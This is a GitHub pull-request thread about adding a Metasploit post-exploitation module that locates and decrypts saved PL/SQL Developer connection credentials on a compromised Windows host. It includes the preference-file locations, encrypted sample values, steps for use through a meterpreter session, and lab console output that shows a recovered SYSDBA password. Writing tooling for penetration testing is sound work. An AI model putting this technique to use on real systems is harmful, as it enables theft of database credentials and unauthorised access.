Add Module for PL/SQL Developer to gather credentials

[Jemmy1228]

Add a post/windows/gather/credential module to gather history/credentials from PL/SQL Developer, which is a widely used tool to manage Oracle Databases.

This module can decrypt the histories and connection credentials of PL/SQL Developer, and passwords are available if the user chooses to remember.

Analysis of encryption algorithm here.
You can find its official website here.

The login credentials and histories are stored in user.prefs which can usually be found in following directories:

%AppData%\PLSQL Developer <Version>\Preferences\<username>\
%AppData%\PLSQL Developer\Preferences\<username>\
<installation path>\Preferences\<username>\

These are the default preference file path, from the latest version to the earliest version.

An example of v8, v9 user.prefs would be

ID=PL/SQL Developer Preference File

[General]
Name=General user preferences
Enabled=True
Order=-1
Rules=

<Omitted>

[LogonHistory]
273645624572423045763066456443024120413041724566408044424900419043284194407643904160

[DSA]
<Omitted>

The lines in the [LogonHistory] section can be decrypted as described here. And the decrypted line in the example would be user/password@server

An example of v14 user.prefs would be

ID=PL/SQL Developer Preference File

[General]
Name=General user preferences
Enabled=True
Order=-1
Rules=

[Preferences]
LastNewsItem=02112023
PlanViewType=0
LastNewsRead=02112023

[Connections]
DisplayName=Imported Fixed Users
IsFolder=1
Number=0
Parent=-1
Username=
Database=
ConnectAs=
Edition=
Workspace=
AutoConnect=0
ConnectionMatch=536870911
Color=65535
DisplayName=Imported History
IsFolder=1
Number=1
Parent=-1
Username=
Database=
ConnectAs=
Edition=
Workspace=
AutoConnect=0
ConnectionMatch=536870911
Color=65535
DisplayName=Test
IsFolder=0
Number=2
Parent=1
Username=sys
Database=ORCL
ConnectAs=SYSDBA
Edition=
Workspace=
AutoConnect=0
ConnectionMatch=536870911
Password=2712415444684238431240824204
IdentifiedExt=0
Color=65535

<Omitted>

The Password in the [Connections] section can be decrypted with the exact same algorithm described above.

Verification

List the steps needed to make sure this thing works

• Download and install PL/SQL Developer 14 or earlier versions.
• (Optional) Change the PL/SQL Developer preference to save the passwords.
• Use PL/SQL Developer to log in to oracle databases. Or add a connection in PL/SQL Developer manually.
• Get a meterpreter session on a Windows host.
• Do: run post/windows/gather/credentials/plsql_developer
• The username, password, SID of connections will be printed.

[github-actions]

Thanks for your pull request! Before this can be merged, we need the following documentation for your module:

• Writing Module Documentation
• Template
• Examples

[github-actions]

Thanks for your pull request! Before this pull request can be merged, it must pass the checks of our automated linting tools.

We use Rubocop and msftidy to ensure the quality of our code. This can be ran from the root directory of Metasploit:

rubocop <directory or file>
tools/dev/msftidy.rb <directory or file>

You can automate most of these changes with the -a flag:

rubocop -a <directory or file>

Please update your branch after these have been made, and reach out if you have any problems.

[bwatters-r7]

Also, I'm seeing warnings about single string matching:

modules/post/windows/gather/credentials/plsql_developer.rb - [ERROR] Rubocop failed. Please run rubocop -a modules/post/windows/gather/credentials/plsql_developer.rb and verify all issues are resolved

[Jemmy1228]

I later realized that the latest version (v15.x.x) of PL/SQL Developer has changed the encryption method. This module does not work for v15.x.x version of PL/SQL Developer. This should be the only version that used a stronger encryption method.

The v14.x.x version of PL/SQL Developer seemed to use the same encryption method that can be decrypted by this module, but the preference file structure has changed (I've not adapted the module to compatible for v14 now) It won't be too difficult to adapt.

But what is annoying is that I don't have installation packages of v9.x.x ~ v13.x.x, so I don't know what the preference file looks like in those versions. From which version did PL/SQL Developer take this change.

[bwatters-r7]

Hi there; I was able to grab the installer by backward surfing the download link and using version 14.04, but I was not able to go any further back to 13, so they may not be hosted or the naming convention might have changed.

I hit a couple of snags on this; I've suggested some error checking in the loop to find the file, but also, the config folder was not named as expected:

msf6 post(windows/gather/credentials/plsql_developer) > show options

Module options (post/windows/gather/credentials/plsql_developer):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   PLSQL_PATH                   no        Specify the path of PL/SQL Developer
   SESSION     2                yes       The session to run this module on


View the full module info with the info, or info -d command.

msf6 post(windows/gather/credentials/plsql_developer) > run

[*] Gather PL/SQL Developer History and Passwords on DESKTOP-D1E425Q
[-] Failed to find C:\Users\msfuser\AppData\Roaming\PLSQL Developer
PL/SQL Developer History and Passwords
======================================

History
-------

[*] Post module execution completed
msf6 post(windows/gather/credentials/plsql_developer) > set PLSQL_PATH 'C:\Users\msfuser\AppData\Roaming\PLSQL Developer 14'
PLSQL_PATH => C:\Users\msfuser\AppData\Roaming\PLSQL Developer 14
msf6 post(windows/gather/credentials/plsql_developer) > run

[*] Gather PL/SQL Developer History and Passwords on DESKTOP-D1E425Q
[-] Failed to find C:\Users\msfuser\AppData\Roaming\PLSQL Developer
PL/SQL Developer History and Passwords
======================================

History
-------

[*] Post module execution completed
msf6 post(windows/gather/credentials/plsql_developer) > 

I was not able to get this to work because the config file was not populated. Is there a way to populate it without actually authenticating? If not, could you send us a dummy file to [email protected]?

[Jemmy1228]

@bwatters-r7 Sorry for the late response, but I managed to figure out the structure of PL/SQL Developer preference file now.

For older versions, the directory is PLSQL Developer, and the credentials can be found in the [LogonHistory] section of the preference file. Contents in the [LogonHistory] section are plain encrypted strings like username/password@SID AS SYSDBA
For newer versions, the directory became PLSQL Developer {version}, and the credentials moved to the [Connections] section. And the contents became something like key-value pairs. (But the whole file is not INI compatible, so I didn't use INIParser to read this file)

I've updated the module to handle both kind of preference files, it should now work for version 14 and earlier.

I haven't reverse engineered the encryption algorithm in v15, the module will show a warning when trying to decrypt a v15 encrypted password
It should now work with v15 new encryption algorithm.

[Jemmy1228]

I was not able to get this to work because the config file was not populated. Is there a way to populate it without actually authenticating? If not, could you send us a dummy file to [email protected]?

For older versions (like v8 v9), you can use the example in my first conversation. Just make a file with the name user.prefs and move it to %AppData%\PLSQL Developer\Preferences\<username>\

I have a copy of PL/SQL Developer v8, I can send it to the email address if you need it.

For newer versions like v14/v15, the installtion packages are still available and can be installed directly.

[Jemmy1228]

@bwatters-r7 I finally figured out how to decrypt the passwords for v15 of PL/SQL Developer by some reverse engineering and the module should be able to decrypt the credentials of any version of PL/SQL Developer now.

[bwatters-r7]

msf6 post(windows/gather/credentials/plsql_developer) > sessions -i -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : DESKTOP-D1E425Q
OS              : Windows 10 (10.0 Build 17134).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getuid
Server username: DESKTOP-D1E425Q\msfuser
meterpreter > background
[*] Backgrounding session 1...
msf6 post(windows/gather/credentials/plsql_developer) > show options

Module options (post/windows/gather/credentials/plsql_developer):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   PLSQL_PATH                   no        Specify the path of PL/SQL Developer
   SESSION     1                yes       The session to run this module on


View the full module info with the info, or info -d command.

msf6 post(windows/gather/credentials/plsql_developer) > run

[*] Gather PL/SQL Developer Histories and Credentials on DESKTOP-D1E425Q
[*] Looking for C:\Users\msfuser\AppData\Roaming\PLSQL Developer 14
[*] Decrypting C:\Users\msfuser\AppData\Roaming\PLSQL Developer 14\Preferences\msfuser\user.prefs
PL/SQL Developer Histories and Credentials
==========================================

DisplayName           Username  Database  ConnectAs  Password  FilePath
-----------           --------  --------  ---------  --------  --------
[Connections]/Import  sys       ORCL      SYSDBA     oracle    C:\Users\msfuser\AppData\Roaming\PLSQL Developer 14\Preferences\msfu
ed History/Test                                                ser\user.prefs

[+] Passwords stored in: /home/tmoose/.msf4/loot/20231109111121_default_10.5.132.167_host.plsql_devel_107689.txt
[*] Post module execution completed
msf6 post(windows/gather/credentials/plsql_developer) > 

[bwatters-r7]

Release Notes

This PR add a post/windows/gather/credential module to gather history/credentials from PL/SQL Developer, which is a widely used tool to manage Oracle Databases.